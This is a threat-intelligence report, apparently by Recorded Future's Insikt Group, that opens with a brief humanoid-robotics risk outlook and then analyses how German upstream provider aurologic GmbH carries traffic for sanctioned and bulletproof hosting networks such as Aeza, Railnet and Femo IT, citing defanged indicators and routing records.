Cyber-espionage activity targeting companies in the robotics sector will almost certainly accelerate. State-sponsored cyber threat actors are already actively targeting the electronics and advanced manufacturing industries to obtain intellectual property that enhances domestic production. As the robotics industry becomes increasingly prevalent, the risk of cyberattacks against companies and their supply chains is expected to grow.

A new industry designed to secure humanoid robots is likely to emerge in the next decade. Securing humanoid robots will become an essential function, leading to the rise of dedicated security sectors, much like those that developed to protect computers in the past.

Geopolitical tensions are likely to intensify as nations compete to secure the resources necessary for the development of humanoid robots. Demand for rare earth elements, semiconductors, and other key components will heighten competition for mines and production facilities. Organizations involved in this supply chain will also need robust cybersecurity measures to protect against espionage and destructive cyberattacks targeting robotic systems.

Mitigations

Track global humanoid robotics developments. Monitor government and corporate investments, export strategies, and regulations shaping the humanoid robotics industry. Use Recorded Future’s Geopolitical Intelligence module to monitor policy shifts and strategic industrial activity.

Prepare for advanced robotics integration. Assess how humanoid and adaptive robotics fit within manufacturing, logistics, and defense operations, including their impacts on the workforce and safety. Use Recorded Future’s Third-Party Intelligence to identify risks as robotics integrates into operations.

Strengthen robotics and Internet-of-Things (IoT) security. Expand IoT security to cover robotic hardware, firmware, and AI systems. Segment networks and continuously monitor for anomalies. Use Recorded Future’s Vulnerability Intelligence for alerts on exploits and threat actor activity targeting robotics.

Monitor criminal and dark web activity. Track chatter and listings on criminal forums related to robotics or IoT exploitation to identify early threats or potential attack planning. Use Recorded Future’s Threat Intelligence module to monitor for dark web and closed-source monitoring tied to robotics targeting.

Anticipate geopolitical supply chain risks. Watch for disruptions or state competition over rare earths, semiconductors, and energy that could impact robotics production. Use Recorded Future’s Geopolitical Intelligence module to gain visibility into geopolitical risks.

Risk Scenario

Scenario: Your company supplies critical components to a firm developing advanced humanoid robots. Meanwhile, a nation pursuing similar ambitions in robotics seeks to acquire your intellectual property to accelerate its own program.

First-Order Implications

Threat

State-backed hackers compromise engineering systems through supplier access points and credential theft. An insider also provides unauthorized access to proprietary robotics designs and control algorithms.

Organizational Risk

• Operational: Disruption to research and development (R&D) and production as systems are secured and code repositories quarantined
• Legal: Possible breach of export-control and defense technology regulations
• Brand: Damage to reputation as a trusted supplier of advanced technology
• Competitive: Early exposure of design concepts erodes secrecy around next-generation capabilities

Second-Order Implications

Threats

Stolen designs enable the foreign nation to fast-track its robotics program, eroding your client’s competitive advantage. Compromised components create a backdoor risk for your client’s production environment.

Organizational Risk

• Operational: Heightened security reviews delay contracts and certifications
• Financial: Loss of key clients and potential cancellation of high-value agreements
• Legal: Cross-border investigations into data handling and export compliance
• Competitive: Diminished differentiation as adversaries replicate your technology and erode market leadership

Third-Order Implications

Threats

The foreign nation deploys robotics derived from stolen intellectual property in global markets and military applications. Governments tighten export rules and exclude compromised firms from critical programs.

Organizational Risk

• Operational: A need for a major redesign of the security architecture and requalification in trusted networks necessitates operations to be stalled
• Financial: Long-term decline in market access and investor confidence
• Legal: Ongoing regulatory oversight and potential sanctions due to past compromise
• Brand: Lasting perception as a high-risk or compromised supplier
• Competitive: Permanent loss of innovation lead and diminished influence over future robotics standards

Further Reading

• The Humanoid 100: Mapping the Humanoid Robot Value Chain
• Humanoid Robots 101
• RedNovember Targets Government, Defense, and Technology Organizations

Executive Summary

German hosting provider aurologic GmbH has emerged as a central nexus within the global malicious infrastructure ecosystem. It provides upstream transit and data center services to a large concentration of high-risk hosting networks, which have consistently ranked among the top sources of validated malicious infrastructure seen within Recorded Future’s Network Intelligence. This nexus includes several hosting providers Insikt Group assesses with a high degree of confidence as threat activity enablers (TAEs), such as Virtualine Technologies, Femo IT Solutions Ltd, Global-Data System IT Corporation (SWISSNETWORK02), Railnet, and the recently sanctioned Aeza Group.

Formed in 2023 following the transition of Combahton GmbH’s fastpipe[.]io network, aurologic operates from its primary facility at Tornado Datacenter GmbH & Co. KG in Langen, Germany. The company markets itself as a high-capacity European carrier, providing dedicated and cloud server hosting as well as data center colocation, IP transit services, and distributed denial-of-service (DDoS) protection to commercial and enterprise customers. Despite its core focus on legitimate network and data center operations, aurologic has emerged as a hub for some of the most abusive and high-risk networks operating within the global hosting ecosystem.

Although it is not possible to confirm why so many of aurologic’s known downstream customers form such a large concentration of high-risk hosting networks, the fact that the company serves as a common link between multiple suspected TAEs is significant. There are likely multiple contributing factors, including aurologic’s self-proclaimed neutrality, its continued provision of upstream connectivity to sanctioned entities such as Aeza, and the perception of limited enforcement risk within the European regulatory environment. Collectively, these factors may have made aurologic an attractive option for high-risk providers seeking operational stability and resilience.

Insikt Group assesses that aurologic's case exemplifies the broader structural challenges surrounding accountability within the hosting ecosystem. Upstream providers occupy a pivotal position within the internet’s infrastructure hierarchy and are uniquely positioned to disrupt persistent abuse. Yet many continue to defer responsibility for downstream activity, intervening only when legally compelled. While neutrality remains a foundational principle of internet governance, in practice, it has become a rationale for inaction, enabling networks repeatedly associated with cybercrime, disinformation, and other forms of abuse to persist. Meaningful progress against such activity can be made by upstream providers acting not solely out of legal obligation, but from an operational and ethical responsibility to prevent the misuse of the infrastructure.

Key Findings

• aurologic has become a central nexus within the global high-risk hosting ecosystem, repeatedly appearing as a common upstream provider.
• aurologic’s continued service to sanctioned and abuse-heavy networks demonstrates a practice of legal compliance over risk avoidance.
• aurologic’s reactive-based abuse handling exemplifies the systematic gap between legal neutrality and operational responsibility within the global hosting ecosystem.

Background

aurologic GmbH emerged in October 2023 as a German hosting provider built on the infrastructure and autonomous system number (ASN) AS30823, which was previously operated by combahton GmbH under the fastpipe[.]io brand. In November 2023, combahton GmbH formally announced its full transition into aurologic GmbH, cementing the rebrand and continuity of operations. aurologic markets a multi-terabit backbone across Europe, with its primary facility located at Tornado Datacenter GmbH & Co. KG. Both companies are headed by Joseph Maximilian Hofmann, who has served as CEO of aurologic since September 2015 and of Tornado Datacenter since April 2022.

Since its inception in 2023, aurologic has been repeatedly cited in intelligence reporting and forums for its role in the broader hosting ecosystem supporting questionable or illicit activity. For example, Qurium’s report on the Doppelgänger disinformation network identified aurologic as one of the German upstream providers enabling Russia-linked infrastructure, maintaining long-standing relationships with hosting providers such as WAIcore Hosting Ltd (AS210281), Daniil Yevchenko (under the brand Altawk; AS203727), and EVILEMPIRE, aka Tnsecurity Ltd (AS216309). Community discussions have further scrutinized aurologic’s ongoing connectivity with Aeza International Ltd, an entity under US sanctions and, more recently, UK sanctions, despite Hofmann’s defense on public forums that Aeza Group LLC was not its “contractual customer.” Hoffman further defended the relationship by emphasizing low abuse volumes, proactive investigations, and compliance with German law. Nevertheless, routing evidence as of writing confirmed that aurologic remained a primary upstream to Aeza International Ltd (AS210644), reinforcing concerns around its continued upstream role.

Beyond Aeza, aurologic has also appeared as a transit provider for some of the largest concentrations of suspected threat activity enablers tracked by Insikt Group, including metaspinner net GmbH, Femo IT Solutions Limited, Railnet LLC, Global-Data System IT Corporation, and more. These relationships position the company at the center of ongoing industry debates about infrastructure abuse and due diligence.

Threat Analysis

Infrastructure and Routing

aurologic maintains an extensive European interconnection footprint spanning key data centers across Germany, Finland, and the Netherlands. Its infrastructure is anchored in major European internet hubs in both Langen and Amsterdam, where the company maintains direct connections with large colocation facilities. These datacenters serve as central exchange points where networks, content delivery providers, and hosting companies interconnect to exchange traffic efficiently. By maintaining a presence in multiple facilities, aurologic ensures fast, redundant, and high-volume data transit across Europe.

This level of connectivity makes aurologic an attractive upstream provider for a range of hosting companies, including those operating in ambiguous or opaque areas of the hosting ecosystem. Whether through technical neutrality, permissive policy, or limited oversight, aurologic’s infrastructure effectively provides a degree of protection and continuity to providers with a reputation for hosting malicious activity. As a result, aurologic sits in a complex position in the hosting landscape, where connectivity and enablement obscure the difference between infrastructure provider and facilitator. This dynamic sets the stage for understanding how aurologic’s network can serve as a foundation for persistent malicious infrastructure and why it plays such a critical role in enabling a broader ecosystem of threat activity.

Threat Activity Enablers

While aurologic’s broad connectivity footprint underpins its strength as a transit provider, it also introduces an enabling function within the threat infrastructure ecosystem. Its combination of network reach, capacity, and perceived permissiveness appears to appeal to questionable hosting providers seeking stable transit relationships that face fewer disruptions from abuse reporting or network-level mitigation efforts. Insikt Group identified more than a dozen TAEs using aurologic for upstream connectivity, ranging from sanctioned entities to self-proclaimed bulletproof hosting providers. The TAEs discussed in this section represent the most significant examples, having displayed some of the highest levels of validated malicious infrastructure within Recorded Future’s Network Intelligence relative to their announced IP space. A full list of active networks analyzed by Recorded Future and linked to aurologic can be found in Appendix A.

Aeza Group

Aeza Group is a Russian hosting provider established in 2021 that primarily operates through its UK-registered company, Aeza International Ltd (AS210644). Since its inception, Aeza has become a well-known TAE, enabling cybercriminal and state-aligned operations through resilient, abuse-tolerant infrastructure. At the time of writing, approximately 50% of Aeza International’s announced IP prefixes are routed via aurologic, highlighting its continued dependence on the German provider for upstream connectivity.

Insikt Group highlighted Aeza as one of the most prominent sources of validated malicious infrastructure in the Recorded Future 2024 Malicious Infrastructure Report, detailing its role in enabling a range of threats, including ransomware and infostealers, and citing its significant role in the Russian disinformation network Doppelgänger. After the release of Qurium’s Doppelgänger report in July 2024, Aeza revealed in August 2024 that DataCamp Limited (AS60068), a UK-based hosting provider, had terminated its contract, and that, as a result, Aeza partnered with aurologic to continue operations (Figure 1). Aeza’s continued operations have since prompted law enforcement and regulatory responses from Russia, the United States, and the United Kingdom.

Figure 1: A post from “mw” on the forum LowEndTalk quoting Aeza (Source: LowEndTalk)

Arrests

In April 2025, Russian authorities arrested Aeza Group co-founders Yurii Meruzhanovich Bozoyan and Arsenii Aleksandrovich Penzev on charges related to their alleged involvement in operating the darknet drug marketplace BlackSprut. The arrests followed an April 1 raid by the Federal Security Service (FSB) on Aeza’s Saint Petersburg headquarters, located in the former Wagner PMC Center.

Both Bozoyan and Penzev were charged under Articles 210 and 228.1 of the Russian Criminal Code for participation in an organized criminal group and large-scale drug trafficking. Russian media reports described the two as having provided the “technical base” for BlackSprut’s operations, which Aeza hosted through its UK-registered entity, Aeza International Ltd.

Sanctions

On July 1, 2025, the US Department of the Treasury’s Office of Foreign Assets Control (OFAC), in

coordination with the UK’s National Crime Agency (NCA), sanctioned Aeza Group and its affiliated companies, labeling them a “bulletproof hosting services provider.” OFAC attributed Aeza Group infrastructure to operations involving BianLian ransomware, Lumma and Meduza infostealers, and RedLine Stealer.

The list of designated companies includes:

• Aeza Group
• Aeza International Ltd (UK branch)
• Aeza Logistic LLC (Russia-based subsidiary)
• Cloud Solutions LLC (Russia-based subsidiary)

On September 19, 2025, the UK government followed the OFAC action by sanctioning the UK-registered Aeza International Ltd, citing its involvement in “destabilizing Ukraine by providing internet services to Russian disinformation campaigns.” However, at the time of writing, Aeza International remains a legally registered company in the United Kingdom and has yet to be struck off the company register.

Continuity

Despite the arrests of its co-founders and the imposition of sanctions, Aeza has demonstrated a sustained ability to reallocate its infrastructure. Rather than signaling operational decline, these actions appear to have prompted a rapid reorganization of assets aimed at preserving control over key network resources and maintaining service continuity.

Within 24 hours of OFAC’s July 2025 sanctions, Insikt Group observed Aeza begin to reallocate its US IP resources to a Serbian organization under the name Smart Digital Ideas DOO, an entity registered mere hours after OFAC announced the sanctions (see Figure 2). Insikt Group assessed with high confidence that this was intended to retain control of any assets affected by the OFAC sanctions.

Figure 2: RIPE organization record for Smart Digital Ideas (Source: RIPE DB)

On July 3, 2025, Insikt Group identified the emergence of Hypercore Ltd, a UK-registered company with infrastructure directly linked to Aeza. On July 4, 2025, Hypercore Ltd was re-assigned IP prefix 45[.]142[.]122[.]0/24 from Smart Digital Ideas DOO, an allocation which was created only one day prior (see Figure 3).

Figure 3: Aeza IP prefix 45[.]142[.]122[.]0/24 reallocation to Hypercore Ltd (Source: RIPEstat)

On July 7, 2025, Smart Digital Ideas DOO was assigned ASN AS215829 in the RIPE database (see Figure 4). Notably, the sponsoring org ORG-AIL64-RIPE was Aeza International Ltd, and the AS object also contains references tracing back to Cloud Solutions LLC.

Figure 4: RIPE objects associated with Smart Digital Ideas AS215829 (Source: RIPE)

Aeza has remained a prominent source of malicious activity throughout 2025. Based on Recorded Future® Malware Intelligence, Insikt Group identified multiple malware samples exhibiting network connections to AS210644. These samples predominantly included infostealers and remote access trojans (RATs) such as AsyncRAT, Destiny Stealer, Meduza Stealer, REMCOS RAT, Rhadamanthys Stealer, RisePro Stealer, and QuasarRAT.

Insikt Group’s recent analysis of the pro-Russian group DDoSia further highlighted Aeza’s continued role in the cybercrime landscape, with Aeza International Ltd (AS210644) accounting for 7.5% of all identified Tier 1 command-and-control (C2) servers between July 2024 and July 2025 (see Appendix B). Also of note, other ASs using aurologic’s services collectively accounted for a further 6% of observed C2 infrastructure, while approximately 13.5% of DDoSia Tier 1 C2 IP addresses were announced either directly by aurologic or by ASNs receiving upstream transit from it.

Femo IT Solutions Limited

Femo IT Solutions Limited (AS214351) is a UK-incorporated organization that, despite announcing only two /24 prefixes, has consistently displayed one of the highest concentrations of validated malicious infrastructure relative to its size, according to Recorded Future Network Intelligence. IP addresses announced by Femo IT Solutions hosted C2 infrastructure for Cobalt Strike, DcRat, Rhadamanthys Stealer, TinyLoader, and THC Hydra. Furthermore, Recorded Futures Malware Intelligence highlighted a number of malware samples exhibiting network connections to Femo IT Solutions infrastructure, such as Amadey, Aurotun, QuasarRAT, RedLine Stealer, REMCOS RAT, Stealc, SystemBC, and SvcStealer.

Insikt Group also identified a significant number of CastleLoader C2 infrastructure hosted on Femo IT Solutions in a recent report titled “From CastleLoader to CastleRAT: TAG-150 Advances Operations with Multi-Tiered Infrastructure.”

Femo IT Solutions' IP prefixes 62[.]60[.]226[.]0/24 and 176[.]46[.]152[.]0/24 are both routed exclusively via aurologic (see Figure 5).

Figure 5: Femo IT Solutions routing (Source: bgp[.]tools)

IP prefix 62[.]60[.]226[.]0/24 is directly controlled by Femo IT Solutions. The prefix was assigned from a larger /17 block belonging to the Iranian Research Organization for Science and Technology (IROST), a government-controlled body under Iran’s Ministry of Science, Research and Technology. Sub-allocations from this space have also been leveraged by other suspected TAEs tracked by Insikt Group, including Aeza entities Aeza International (AS210644), Hypercore Ltd, and Smart Digital Ideas DOO, as well as Global Connectivity Solutions and Global Internet Solutions (see Figure 6).

Figure 6: IP allocations from IROST to TAE Networks (Source: bgp[.]tools)

The second announced prefix, 176[.]46[.]152[.]0/24, is attributed to New Way LLC, a company registered in Oman. This allocation derives from a /19 netblock controlled by Iranian internet service provider (ISP) Farahoosh Dena PLC, which offers data center and hosting services. The RIPE object for this range lists contradictory details, including a Philadelphia residential address and an Omani registration (Figure 7).

Figure 7: IP allocation from Faroosh Dena PLC to New Way LLC (Source: RIPE DB)

The network relies exclusively on Aurologic for upstream connectivity and shows clear operational ties to the bulletproof hosting provider Defhost (see Figure 8).

Figure 8: Defhost Telegram channel (Source: Recorded Future)

Defhost emphasizes “fast abusive VPD/VDS” with resilience against takedown efforts by any government, specifically Western law enforcement, and anti-abuse organizations such as “The Spamhaus Project,” while simultaneously assuring customers that its operations will remain uninterrupted. Insikt Group assesses with high confidence that Femo IT Solutions is under the control of Defhost.

Global-Data System IT Corporation

Global-Data System IT Corporation (AS42624), also recognized under the name SWISSNETWORK02, emerged in July 2024 following the transfer of ASN resources from Simple Carrier LLC (Figure 9). Within just over a year of operation, the network accumulated one of the highest concentrations of malicious activity observed in Recorded Future’s Network Intelligence, ranking within the top ten for malicious activity density as of September 2025. Its infrastructure has hosted a wide range of malware families, including Cobalt Strike, Sliver, QuasarRAT, Remcos Rat, Dark Crystal RAT, Latrodectus, Amadey, and multiple stealer families such as Rhadamanthys, RedLine Stealer, and Meduza.

Figure 9: Simple Carrier LLC transferring AS34888 and AS42624 to Global-Data System IT Corporation (Source: RIPE DB)

Insikt Group has assessed with medium confidence that Global-Data System IT Corporation is closely tied to PrivateAlps, an offshore privacy-centric hosting provider registered in Switzerland that openly advertises no Know-Your-Customer (KYC) policies, Digital Millennium Copyright Act (DMCA)-ignored hosting, and Tor-friendly infrastructure.

Beyond malware hosting, the infrastructure has supported DDoSIA, Socks5Systemz, and other commodity malware ecosystems. It has also been leveraged in targeted campaigns, such as TAG-144’s operations against Latin American governments.

All of Global-Data System IT Corporation’s active prefixes are routed solely through aurologic. Routing graphs from September 2025 confirm that all eleven IPv4 prefixes are routed through aurologic, with no diversification, making aurologic the critical enabler of Global-Data System IT Corporation’s reach and resilience.

By anchoring its connectivity to a German upstream like aurologic, Global-Data Systems IT Corporation maintains global availability despite repeated associations with malicious infrastructure. Global-Data System IT Corporation’s reliance on a single upstream provider creates a natural single point of failure that could, if interrupted, materially disrupt its operations. The persistence of this arrangement, however, highlights how aurologic’s connectivity enables the network’s reach and suggests permissive or insufficient vetting practices, consistent with patterns observed in other aurologic-linked suspected TAEs such as metaspinner net GmbH and Railnet LLC.

Metaspinner net GmbH

Metaspinner net GmbH (AS209800) was a recently registered autonomous system created on April 25, 2025, and was announced exclusively through aurologic (Figure 10). The name “metaspinner net GmbH” had long since been associated with a legitimate Hamburg-based software company. However, multiple factors indicate that the autonomous system “metaspinner” was not controlled by the same entity, but rather by threat actors likely affiliated with Virtualine Technologies.

[UPDATE] As of November 10, 2025, metaspinner net GmbH has provided substantial evidence confirming Insikt Group’s original assessment that their identity was unlawfully and fraudulently used in the registration of AS209800. A falsified RIPE end-user agreement provided to Insikt Group highlights how a basic verification check against publicly accessible company registration documents could have prevented the fraudulent registration. metaspinner net GmbH (Hamburg, Germany) has no affiliation with AS209800, Virtualine Technologies, or any related malicious activity associated with that network.

Since its inception, AS209800 has accumulated a substantial malicious footprint. Recorded Future has observed infrastructure within the ASN hosting a wide array of malware families and related tooling, including loaders like TinyLoader and SmokeLoader, information stealers such as Stealc, Amadey, and Phorpiex, and multiple remote access trojans, including AsyncRAT, njRAT, QuasarRAT, Dark Crystal RAT, and REMCOS RAT. Botnets such as Moobot, as well as post-exploitation frameworks like Cobalt Strike, have also been detected. These observations align with Spamhaus, which has recently taken notice of the high volume of suspicious activities appearing from the network within a short timeframe.

Figure 10: AS209800 appearing downstream from AS30823, aurologic GmbH, on October 3, 2025 (Source: bgp[.]tools)

As of October 3, 2025, AS209800 originated twelve IPv4 prefixes within the ranges 91[.]92[.]240[.]0/22, 158[.]94[.]208[.]0/22, and 178[.]16[.]52[.]0/22. According to RIPE, none of these IPv4 blocks are owned by metaspinner. Instead, they are sub-allocated from a Turkish local internet registry (LIR) MGN Teknoloji Anonim Sirketi, headquartered in Istanbul (Figure 11). This LIR also sponsors several other suspicious ASNs, all of which were created in 2025 (Appendix C).

Figure 11: Visualization of IPv4 prefixes being assigned to metaspinner. (Source: Recorded Future)

AS209800’s historical footprint further suggests possible repurposing. AS209800 briefly advertised an IPv6 /48 in December 2020 before going dormant, only to reemerge in 2025 with entirely new IPv4 address spaces and links to MGN Teknoloji. While no official transfer was logged in RIPE, the shift in behavior suggests the ASN was taken over or reallocated, a tactic consistent with other impersonation incidents observed in the same timeframe, such as VSVK Onderhoud B.V. (AS213511).

Irregularities are evident in domain registrations. The legitimate software company by the same name, metaspinner, used to operate the domain metaspinner[.]de and meta-spinner[.]net, which over time redirected to its current domain, preispiraten[.]de (see Figures 12 and 13). The domain metaspinner[.]net, originally lapsed in the mid-2000s, was re-registered on April 18, 2025, initially through URL Solutions, Inc., and later its record was updated to reflect its registrar as NiceNIC, a registrar known for abuse-tolerant practices.

Figure 12: The legitimate software company metaspinner net GmbH listed on the US version of preispiraten[.]de, pricepirates[.]com (Source: pricepirates[.]com)

Figure 13: Preispiraten (aka Pricepirates) listed as a service of metaspinner net GmbH on the “Imprint” page (Source: preispiraten[.]de)

At the time of analysis, metaspinner[.]net was hosted at IP address 65[.]21[.]125[.]233, which Insikt Group assesses with high confidence to be associated with Virtualine Technologies. Both RIPE and WHOIS data for the domain list a virtual office address in London’s 71-75 Covent Garden, an address previously used by organizations tied to Virtualine Technologies. Historical IP hosting records for 65[.]21[.]125[.]233 show that metaspinner[.]net operated on shared infrastructure with domains linked to Virtualine Technologies, such as virtualine[.]net and virtualine[.]org. Historical IP hosting records also show that it shared infrastructure with vonie[.]net, a domain once associated with VSVK Onderhoud B.V. (AS213511). Furthermore, 65[.]21[.]125[.]233 is also hosting four additional suspicious hosting-related domains: proxio[.]net, proxio[.]cc, antired[.]net, and lanedo[.]net. More details on the significance of these domains and their connection to Virtualine Technologies are outlined in the next subsections.

VSVK Onderhoud B.V.

The name of a legitimate Dutch construction firm, VSVK Onderhoud B.V., was used to register AS213511 on January 27, 2025. The legitimate VSVK Onderhoud operates exclusively in the Netherlands and has no IT or telecommunications business. According to historical WHOIS data, AS213511 was observed having Railnet LLC (AS214943) as its upstream provider. Railnet LLC notably has strong ties to Virtualine Technologies. This observed incident underscores an emerging pattern in AS-level impersonation campaigns, where threat actors may fabricate corporate identities and leverage legitimate-seeming infrastructure to enable phishing and IP hijacking schemes. As of writing, AS213511 is no longer observed on the global routing table.

Proxio

Proxio (proxio[.]net) appears to be a newly established proxy service with notable connections to Virtualine Technologies. Proxio has been recently advertised across dark web and underground forums, positioning itself as a high-speed residential or mixed proxy provider. Notably, a forum user operating under the alias “Secury” on BlackHatWorld Forum, with a Virtualine Technologies logo as the profile picture, was observed promoting the Proxio service (see Figure 14). This overlap in branding and infrastructure strongly reinforces the likelihood that Proxio and Virtualine Technologies are linked.

Figure 14: BlackHatWorld user “Secury” advertising Proxio (Source: BlackHatWorld)

Anti-Red Hosting

Anti-Red Hosting (antired[.]net) claims to be providing “Anonymous Anti-Red Bulletproof Hosting,” with its domain registration also listing a virtual office address in London’s Covent Garden. Previously, antired[.]host was observed redirecting to antired[.]net, which showed an association with the hosting service named “Spamhouse - F**k The Haus!”. Notably, Virtualine Technologies’ logo can be seen on the top left of the page (Figure 15).

Figure 15: Home page of antired[.]net as of October 25, 2025 (Source: URLScan)

Lanedo GmbH

On October 16, 2025, all twelve IPv4 prefixes announced by metaspinner net GmbH via AS209800 with netname “METASPINNERNET” were re-allocated to Lanedo Datacenter (ORG-LD194-RIPE), under the new netname LANEDONET”, originating from Railnet LLC, AS214943 (see Figures 16 and 17). This shift occurred at the peak of malicious activity on the network, with Recorded Future’s Network Intelligence identifying over 76 validated C2 servers.

Figure 16: Prefixes once observed under “METASPINNER” (AS209800) are now showing a description of “LANEDONET” as of October 22, 2025 (Source: bgp[.]tools)

Figure 17: An example of one of metaspinner’s IPv4 prefixes being reassigned to lanedonet (Source: RIPEStat)

Lanedonet Datacenter was registered with RIPE on the same day of the IP prefix transfers from metaspinner, with a listed address of Strawinskylaan 3051 1077 ZX, Amsterdam. The address appears to be an office space for rent and is home to several different organizations. However, its domain, lanedo[.]net, presents as a German internet service provider (ISP) offering dedicated servers in Germany, the Netherlands, Bulgaria, the United States, and Ukraine. Insikt Group identified an additional organization, Lanedo GmbH (ORG-LG235-RIPE), within the RIPE database, registered just three days prior on October 13, 2025, through the email address listed on its record, info[@]lanedo[.]net.

Several open sources show a legitimate company named “Lanedo GmbH i.L.”, located at Kollaukamp 1,0 22453 Hamburg, Germany, that has operated as a software and open-source development consultancy since January 2009. The company’s operational domain is lanedo[.]com. There is currently only one RIPE resource assigned to Lanedo GmbH at the time of writing, IPv6 prefix 2a147::/48.

Insikt Group assesses with high confidence that the threat actor(s) behind metaspinner have mirrored their technique of impersonating a legitimate company when setting up lanedo[.]net, pivoting from metaspinner, as the network had come under increased scrutiny due to its high volume of malicious traffic.

Railnet LLC

Railnet LLC (AS214943) was incorporated in April 2024 and, within its first year of operation, quickly emerged as one of the most abuse-heavy networks tracked by Recorded Future. Infrastructure hosted in Railnet’s space has supported over 30 malware families, including DarkComet, Amadey, Remcos RAT, Latrodectus, Dark Crystal RAT, and commodity stealers such as Rhadamanthys, StealC, Vidar, and Lumma.

Railnet is formally registered in Kentucky under an address linked to an organization named Whitelabel Networks LLC, and an incorporation agent tied to several other questionable hosting entities. While Kentucky is not a traditional secrecy jurisdiction, the choice of state and use of mail-drop offices suggest an effort to reduce visibility by avoiding more obvious havens, such as Delaware or offshore jurisdictions.

According to routing data observed on August 28, 2025, Railnet originated nineteen IPv4 prefixes, of which approximately 95% are routed via aurologic (Figure 18), with only a single /24 range being routed through another German provider, Pfcloud UG.

Figure 18: Railnet LLC’s routing through aurologic GmbH as of August 28, 2025 (Source:bgp[.]tools)

Railnet’s operational significance lies not just in the malware hosted directly, but in its role enabling multiple bulletproof hosting entities like Virtualine Technologies, DripHosting (DiorHost), and RetryHost.

Virtualine Technologies, a Russia-linked bulletproof hoster that openly advertises on Russian-language forums, leases at least fourteen prefixes originated by Railnet (Figure 19). These prefixes are often registered to various LIRs, which are then announced via Railnet, allowing Virtualine to mask ownership while maintaining operational control. Virtualine’s registration address in London’s 71-75 Covent Garden, a hub for shell entities, has also been associated with other suspected TAEs, including Stark Industries Solutions, Aeza International Ltd, and Global Connectivity Solutions LLC.

Figure 19: IP sub-allocation from Rapidnet to Virtualine Technologies, routed through Railnet LLC (Source: RIPE)

Railnet originates multiple prefixes used by DripHosting, a provider that brands itself interchangeably as DiorHost (Figure 20). Forum chatter and domain infrastructure confirm the overlap with driphost[.]net resolving to a DiorHost-branded page. Abuse contacts also point to dior[.]host, reinforcing that both labels are likely organizations operated by the same operator.

Figure 20: IP sub-allocation from Euro Crypt EOOD to DripHosting, routed through Railnet LLC (Source: RIPE)

RetryHost, another forum-advertised bulletproof provider offering virtual private network (VPS) and remote desktop protocol (RDP) services, originates a single range through Railnet (Figure 21). RetryHost explicitly markets itself as “bulletproof,” and overlapping infrastructure suggests close coordination or common backend management between Railnet and RetryHost.

Figure 21: IP sub-allocation from Telco Power Ltd to RetryHost, routed through Railnet LLC (Source: RIPE)

These providers collectively demonstrate how Railnet acts as a common backbone for “bulletproof” hosting operations, offering anonymity, routing resilience, and the ability to cycle short-lived leased prefixes to evade detection and blacklisting (Figure 22).

Figure 22: Railnet LLC’s observed prefixes from September 2024 to August 2025 (Source: RIPE Stat)

By carrying the vast majority of Railnet’s traffic, aurologic effectively extends global reach to three separate bulletproof hosting brands that have been consistently tied to malware distribution, botnet infrastructure, and illicit VPS or RDP services. While Railnet’s operators leverage offshore formations, obscure company formations, and prefix cycling to obscure their footprint, the persistence of their upstream relationship with aurologic highlights a broader concern: the enabling role of established European networks in sustaining high-risk or high-abuse infrastructure.

As of October 27, 2025, Recorded Futures Network Intelligence observed over 80 validated C2 servers on Railnets AS. This is likely a direct result of originating the twelve IPv4 prefixes transferred from metaspinner to Lanedo Datacenter (lanedo[.]net).

The case with Railnet underscores a recurring theme: aurologic’s upstream connectivity does not appear incidental, but repeatedly visible in the routing paths of various TAEs. Railnet and other TAEs appear highly dependent on aurologic’s permissive transit to maintain continuity despite widespread abuse reporting.

The Fine Line Between Neutrality and Negligence

The persistence of aurologic’s upstream connectivity to multiple suspected TAEs raises a broader question that extends beyond any single provider: To what extent are such relationships the result of negligence, a failure to apply due diligence, as opposed to complicity, where providers knowingly accept or tolerate high-risk customers as a part of their business model? In the context of internet infrastructure, this distinction is critical but often difficult to prove. Transit providers occupy a unique position as gatekeepers of global connectivity. Their willingness or unwillingness to sever ties with abuse-heavy networks directly determines whether malicious infrastructure remains reachable.

Negligence in this context often manifests as weak Know-Your-Customer (KYC) procedures, insufficient abuse handling, or a lack of proactive monitoring of downstream announcements. Many upstream networks argue they cannot fully control their downstream customers’ actions and rely on complaints to trigger action or simply redirect any abuse reporting to the customer in question, taking no further action. While aurologic has echoed a similar line of defense, typically directing abuse complaints to its abuse email address, hosting community members have offered anecdotal evidence stating otherwise (Figures 23 and 24).

Figure 23: LowEndSpirit Forum user “Encoders” describing no responses to abuse complaints (Source: LowEndSpirit Forum)

Figure 24: LowEndSpirit user “Treesmokah” pointing out that Hofmann’s Tornado Datacenter had been allegedly raided due to its relationship with Pfcloud UG. (Source: LowEndSpirit Forum)

In June 2024, CORRECTIV, a German non-profit investigative journalism organization, met with aurologic CEO, Joseph Hofmann at his office in Langen to discuss Qurium’s findings that data traffic from Tnsecurity Ltd and other companies in Aeza’s sphere of influence ran through aurologic’s infrastructure, leveraging its connectivity to global internet providers and supporting the Doppelgänger disinformation campaign. Hofmann maintained that he was unaware of any of his customers supporting the campaign, but appeared surprised when shown a link to a fake news article that led to his organization. He argued that this did not constitute definitive proof and insisted that only formal contact from authorities would prompt action. Hofmann describes his situation as a business dilemma, stating, “I can kick everyone out, but then at some point I won’t make any sales,” and that is why he waits for law enforcement correspondence.

aurologic’s sustained relationships with multiple TAEs strain the boundaries of plausible negligence. Its continued role in providing upstream transit for Aeza International Ltd, despite US and UK sanctions, suggests a reactive posture focused on legal compliance rather than risk avoidance. Since aurologic operates under German jurisdiction, it may not be violating domestic law. On July 1, 2025, Joseph Hofmann, under the username “jh_aurologic”, publicly defended the company’s position on the LowEndTalk forum (Figure 25), claiming the customer under review was not Aeza Group LLC. As of this writing, aurologic is not an upstream provider for Aeza Group LLC (AS216246), but remains a major upstream provider for Aeza International Ltd (AS210644).

Figure 25: aurologic CEO Joseph Hofmann commenting on the situation surrounding Aeza Group LLC (Source: LowEndTalk)

The distinction between oversight and permissive policy is further blurred by the ease and pace at which fraudulent downstream providers rebrand by leveraging obscure or offshore entities, cycling through prefixes, and establishing new LIRs. This pattern was exemplified in a case documented by Spamhaus, which detailed a now-defunct network of TAEs all operating behind layers of decoy ISPs and ultimately routed through aurologic (see Figure 26).

Figure 26: The Spamhaus Project points out aurologic’s proximity to malicious networks (Source: X, formerly knows as Twitter)

